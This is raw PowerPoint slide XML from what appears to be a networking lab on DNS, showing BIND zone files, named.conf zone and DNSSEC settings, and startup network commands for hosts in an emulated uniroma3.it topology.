            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F68D9AC8-8A38-E446-0574-4EB5E8026C34}"/>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23" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78121B2-DA84-450D-1DF2-DBDD3044BCE1}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9224" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73D1CE14-A8D6-AE0A-B1ED-67B2B0127FD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4024669" y="6030411"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9225" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D297580-45DE-FE3D-535A-0FCAEE682DC8}"/>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eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9226" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E090752-9589-5917-CF22-A7279207BDFF}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3568088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FDF19-C2B3-FCB2-E96C-0126D3249B54}"/>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FCE0AD13-C196-E1A0-C6E1-B06FC9AA13FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1259632"/>
            <a:ext cx="7641005" cy="2442458"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F31A22-49D2-8420-126C-3CDF82E3A9EF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>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$TTL 60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     dnsit.it.    root.dnsit.it. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120401 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      dnsit.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit.it.       IN      A       10.0.3.10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniroma3.it.    IN      NS      dnsuni.uniroma3.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni.uniroma3.it. IN  A       110.0.0.10</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ABB4B82B-1CF0-8A62-4BD3-C0F2C2570B12}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2712" cy="13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nsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/etc/bind/db.it</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EB253A17-317E-E845-34A8-3D4762376A84}"/>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C7EF1C11-0224-B5E8-55AC-EBB8F2CC85AA}"/>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60B02FEF-6ECA-1BBE-BB1D-3B954BB0D4BB}"/>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5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D53E6DC-A388-4A3A-6172-CE04F8FBE44D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2333354" y="4387035"/>
            <a:ext cx="6116028" cy="1143000"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{425E44F0-C46A-A6A1-E2F7-DCD883A5E5BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>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IN  NS    ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.        IN  A     10.0.3.5</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E71984C-7E8F-C5B9-8CA9-F01D77694FC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2936" cy="248"/>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nsit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/etc/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</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27276816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3A681-F384-4538-FB26-AE1E8C822D3A}"/>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CF63FEB0-E8C7-9798-779B-214D008FA525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1235546"/>
            <a:ext cx="7145435" cy="4111532"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="1057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE32C3FB-398B-809E-7FE5-4BCC26A22A64}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="991"/>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include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named.conf.options</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>”;</a:t>
              </a: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zone “.” {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    type hint;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file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zone “it” {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    type master;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file “/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/db.it”;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dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-policy default;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inline-signing</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36913D7B-FE84-470D-EA74-06E77EC3996A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3133" cy="13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nsit</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6C69C333-D459-7A51-0755-A0BE1078277E}"/>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530A84C4-E997-5633-1E88-1AD059D5DEBB}"/>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C9FCD0F6-F17E-0A3D-6B76-64FF75409B4D}"/>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3094900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0524E-8599-0707-587D-E76BAB3F24E8}"/>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A1151D67-38D7-7C7E-D99A-D9AEEB688BBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2523177" y="2180769"/>
            <a:ext cx="7145435" cy="2298879"/>
            <a:chOff x="332" y="3537"/>
            <a:chExt cx="5943" cy="591"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D23F9C6-B1C2-048F-2685-7DCB38535946}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="332" y="3587"/>
              <a:ext cx="5943" cy="541"/>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options {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory "/var/cache/bind";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    key-directory "/var/cache/bind/keys";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    allow-recursion { 110.0.0.0/24; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-validation no;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    listen-on-v6 { none; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64FEC78D-B4E9-0E78-DDD3-00E2558F4022}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="409" y="3537"/>
              <a:ext cx="3640" cy="99"/>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nsit</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named.conf.options</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5A6EA61E-A860-05C7-C2A6-B6223328E76B}"/>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266663EA-41DA-3261-9050-17F3A496E4AE}"/>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EAFD6D47-4732-B971-C33D-3983E2C5BEE1}"/>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21684351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D4D44-110E-7039-FA49-9CD6345AA93F}"/>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C878485C-8710-11E3-F8C2-42754D2F26C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2422827" y="2290299"/>
            <a:ext cx="7346346" cy="2277401"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="802"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{988A536B-3D94-5BBF-C48A-2D9D24284396}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="744"/>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110.0.0.10/24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default via 110.0.0.3</a:t>
              </a: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/var/cache/bind/keys</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/var/cache/bind</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775 /var/cache/bind</a:t>
              </a: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EB465F44-25A5-6269-4E47-6AB704D2A1F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="1667" cy="143"/>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nsuni.startup</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4B714970-D818-4193-4391-B6FC749D340C}"/>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137DE5BD-9ECE-CFD0-AA39-B69DD70D5862}"/>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CAA93E7F-151A-6D20-56C1-D46F4A27878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1233463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1A4D5-B984-61B0-A5F3-632986CE3E7A}"/>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83488E62-FD3A-A5C0-07F1-2F6964996968}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1259634"/>
            <a:ext cx="9164577" cy="3026388"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="7128" cy="964"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4F12A0D-4A9D-46DC-035E-289DF57F3C4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="7128" cy="906"/>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$TTL    60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     dnsuni.uniroma3.it.    root.dnsuni.uniroma3.it. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120401 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@                       IN  NS  dnsuni.uniroma3.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni.uniroma3.it.     IN  A   110.0.0.10</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1.uniroma3.it.        IN  A   110.0.0.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2.uniroma3.it.        IN  A   110.0.0.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>router.uniroma3.it.     IN  A   110.0.0.3</a:t>
              </a:r>
            </a:p>
            <a:p>
